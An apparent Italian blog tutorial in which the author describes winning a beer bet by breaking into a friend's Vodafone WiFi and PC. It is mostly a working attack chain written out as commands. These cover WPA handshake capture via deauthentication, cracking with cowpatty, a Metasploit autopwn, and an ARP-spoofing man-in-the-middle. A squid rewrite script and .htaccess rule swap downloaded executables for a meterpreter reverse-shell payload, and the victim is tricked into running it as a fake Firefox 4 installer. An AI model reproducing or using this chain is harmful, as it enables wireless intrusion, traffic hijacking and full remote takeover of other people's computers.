ecco come vincere una birra (=
durante un dibattito lui diceva che la sua password del wifi ( quella di default del router vodafone ) era inviolabile, e che anche uno si fosse connesso non avrebbe potuto creargli problemi perchè aveva windows SP 3 , quindi abbiamo fatto una scommessa che non era cosi, lui mi ha detto che potevo provare ad entrargli , e se ci fossi riuscito mi offriva una lime corona
ok iniziamo:
allora prima di tutto
TOOL REQUIREMENT:
- NMap ( Included on bt4 or bb )
- Ettercap ( Included on bt4 or bb )
- CoWPAtty ( coded by god )
- Rainbow tables ( in questo caso della vodafone e quindi http://www.megaupload.com/?d=IGN8BQN3 )
- Squid3 ( reposity debian-based )
- Metasploit
- Apache2
ok iniziamo:
per prima cosa ho attivato il monitor di aircrack
airmon-ng start wlan0
e poi ho scansionato fino a trovare il suo bssid , essid , channel, e un client ( il suo telefono nokia ) connesso tramite:
airodump-ng mon0ok poi specifichiamo il range di airodump tramite:
airodump-ng --channel CHANNEL --bssid BSSID --write file mon0e ho deauthenticato il suo cellulare dalla rete
aireplay-ng --deauth 1 -a BSSID -c CLIENT_DA_DEAUTHENTICARE_MAC mon0ok ottenuto l'handshake WPA, diamo il file cap in pasto a coWPAtty (=
cowpatty -s ESSID -r file.cap -d vodafoneaspetto un pò di minuti , e tatata ecco la sua password! =)
bon connetttiamoci alla sua rete:
wpa_passphrase ESSID PASSWORD > amico.conf
wpa_supplicant -Dwext -iwlan0 -c /root/amico.conf
dhclient wlan0ok sono connesso YO ,
ok iniziamo con il trovare tutti gli host connessi ^^
nmap -sP -T4 -n 192.168.1.1-255
trovo 4 target
192.168.1.1 # Router192.168.1.2 # (= io192.168.1.3 # Suo fisso192.168.1.4 # Suo nokia
ok allora per prima cosa, provo un metasploit autopwn =) che non darà nessun esito
/etc/init.d/postgresql startaprite da root il terminale psql e creo l'utente:
ALTER USER saeko WITH PASSWORD 'banana';ok aprite msfconsole
\q
db_driver postgresql
db_connect saeko:"banana"@localhost/msf
db_nmap -sS -T4 -O 192.168.1.3
db_autopwn -x -e -R great
ma nulla....
allora proviamo una strategia stranaaa! (=
avviamo apache2, in /var/www
creiamo un file .htaccess con questo:
Options +FollowSymlinksa cosa serve? semplice per reindirizzare tutte le pagine sul nostro eseguibile exploit.exe che ora creeremo ^^ ok apriamo
RewriteEngine on
RewriteRule ^(.*) exploit.exe
msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.2 X > /var/www/exploit.exeora avviamo apache2:
/etc/init.d/apache2 start
ora ho modificato squid3 in maniera da permettere il suo funzionamento pure sulle reti locali, basta cercare localnet e decomentare la propria sottorete, e poi attivare tramite decomentazione di http_access allow localnet , e poi cerchiamo 3128, e aggiungiamo transparent (= e infondo mettiamo:
url_rewrite_program /percorso/prossimoscript.pl
il prossimo script formato cosi:
use IO::Handle; use File::Basename; $myip = "192.168.1.2"; while (<>) { chomp $_; if ($_ =~ /(.*\.exe)/i) { $file = basename( $1 ); $new_url = "http://$myip/$file"; print "$new_url\n"; } else { print "$_\n"; } }
avviamolo
/etc/init.d/squid3 restart
ora settiamo iptables sul nostro pc
iptables -t nat -a PREROUTING --in-interface wlan0 -p tcp --destination-port 80 --jump REDIRECT --to-port 3128echo 1 > /proc/sys/net/ipv4/ip_forwardok ora ho iniziato un attacco di tipo arp spoofing ( spiegato nel precedente articolo )
con:
ettercap -T -M arp -i wlan0 // /192.168.1.2/ho avviato multi/handler da msfconsole
use exploit/multi/handlerset LHOST 0.0.0.0exploit -jpoi con una scusa gli ho fatto scaricare firefox 4, dello stile, comunque veramente una meraviglia sto firefox 4, lui : davvero va cosi bene? aspetta che lo provo! cosi è caduto nella mia trappola, ha scaricato un exe, che non era l'installer di firefox 4 ma il nostro exploit.exe
e di poi lifeissimple, aperta la sessione meterpreter, spari un getsystem e hai vinto...
Saeko